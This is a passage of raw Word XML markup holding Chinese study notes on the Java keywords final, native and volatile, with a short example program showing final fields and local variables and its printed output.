        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰符修饰</w:t>
      </w:r>
      <w:r>
        <w:t>，如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>修饰一个类，说明这个类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不能被继承</w:t>
      </w:r>
      <w:r>
        <w:t>，即此类不可能有子类。被定义为</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>的类一般是一些具有固定作用或者来完成一些标准功能的类。如</w:t>
      </w:r>
      <w:r>
        <w:t>'Double</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Math'</w:t>
      </w:r>
      <w:r>
        <w:t>等，将一个类定义为</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>类型可以保证这个类的功能属性等被固定下来，从而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保证在引用此类时实现的功能不会出现错误</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081264C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A72A05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>修饰的方法是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不能被子类所覆盖的方法</w:t>
      </w:r>
      <w:r>
        <w:t>。即如果某个类的方法被</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>修饰，则此类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>子类便不能再重新定义与此方法同名的自己的方法</w:t>
      </w:r>
      <w:r>
        <w:t>，这样可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保证此方法只能实现某一对应操作，防止子类对父类的一些关键方法进行错误的重定义，保证程序安全和准确。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0903D7B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>所有已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰符限定的方法</w:t>
      </w:r>
      <w:r>
        <w:t>，以及所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类中的方法</w:t>
      </w:r>
      <w:r>
        <w:t>，都被默认为是</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>的。因为这些方法均不能被子类继承，所有都不可能被重载，所以都是最终的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7376348E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段和局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB1F94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>修饰的字段和局部变量，它们的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一旦被给定，是不能更改的</w:t>
      </w:r>
      <w:r>
        <w:t>，它们都是只读量，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在定义的时候没有初始化赋值，则之后能且只能被赋值一次，不能被赋值多次</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43872B23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338EA44C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>而我们知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰静态量，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>结合起来为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，它的意思就是常量</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如圆周率</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我们在使用过程中不需要对其修改，并且可以全局使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0241D580" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A83377" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时，若不给定初始值，会按默认值进行初始化：数值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，布尔型为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，引用型为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CB3D43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在定义</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>字段时，若没有</w:t>
      </w:r>
      <w:r>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:t>，必须只能赋值一次，不能缺省。这种字段的赋值方式有两种：一种是在定义变量的时候就赋予初始值，另一种是在构造函数中进行赋值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA2CCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>局部变量（某个方法的变量）中，也必须且只能赋值一次。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9578E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4B49B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class practice {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C580CF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String args[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F5E92C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Person goldsun1 = new Person(15);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF127B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun1.age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074B5D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(goldsun1.pi);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187041E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        //goldsun1.age = 20;</w:t>
      </w:r>
      <w:r>
        <w:t>非法赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C59F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        final int tureage ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A34160E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tureage = 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F1DEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        //tureage = 30; </w:t>
      </w:r>
      <w:r>
        <w:t>非法赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6BA825" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(tureage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E833C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D6EF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5B45E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Person{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D5696B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    static final float pi = 3.1415f;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A39FDAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    final int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5741F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Person(int i){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B048B6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        age = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386596FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E18D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBBB09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E731452" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF75A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3.1415</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB0E4FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4D20EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF47F88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>含义：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>原生的，本地的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD6C09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>用途：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B650C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>描述：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字用来修饰方法。被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字修饰的方法是一个原生态方法，方法对应的实现不是在当前文件，而是在用其他语言（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）实现的文件中</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>不是完美的，</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的不足除了体现在运行速度上要比传统的</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>慢许多之外，</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>语言本身不</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>能对操作系统底层进行访问和操作（如系统硬件等</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>，为此</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:t>方法来扩展</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>程序的功能，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>JNI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r>
        <w:t>调用其他语言来实现对底层的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E452B39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>volatile</w:t>
      </w:r>
      <w:r>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97F023" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>含义：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>易变的，不稳定的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E46507" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>用途：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修饰变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46049030" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>描述：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:t>语言中用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volatile </w:t>
      </w:r>
      <w:r>
        <w:t>修饰的变量通常是为了保证不同线程对这个变量进行操作时的可见性，即一个线程修改了某个变量的值，这新值对其他线程来说是立即可见的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提供的一种轻量级的同步机制</w:t>
      </w:r>
      <w:r>
        <w:t>，在并发编程中，它也扮演着比较重要的角色，可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>被看作是一种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>程度较轻的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> synchronized ”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>块相比，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">volatile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>变量所需的编码较少，并且运行时开销也较少，但是它所能实现的功能也仅是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> synchronized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C68B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E90D51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>特性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB0AD0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EB9047" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保证内存可见</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>当一个共享变量被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volatile </w:t>
      </w:r>
      <w:r>
        <w:t>修饰时，它会保证修改的值会立即被更新到主存，当有其他线程需要读取时，它会去主存中读取新值。也就是每次取值在都会取内存中的值，每次更新都会立即更新主存中的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0AFBCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536A41EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>禁止指令重排</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volatile </w:t>
      </w:r>
      <w:r>
        <w:t>关键字能禁止指令重排序，所以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volatile </w:t>
      </w:r>
      <w:r>
        <w:t>能在一定程度上保证有序性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">volatile </w:t>
      </w:r>
      <w:r>
        <w:t>关键字禁止指令重排序有两层意思，</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）当程序执行到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volatile </w:t>
      </w:r>
      <w:r>
        <w:t>变量的读操作或者写操作时，在其前面的操作的更改肯定全部已经进行，且结果已经对后面的操作可见，在其后面的操作肯定还没有进行；</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）在进行指令优化时，不能将在对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volatile </w:t>
      </w:r>
      <w:r>
        <w:t>变量访问的语句放在其后面执行，也不能把</w:t>
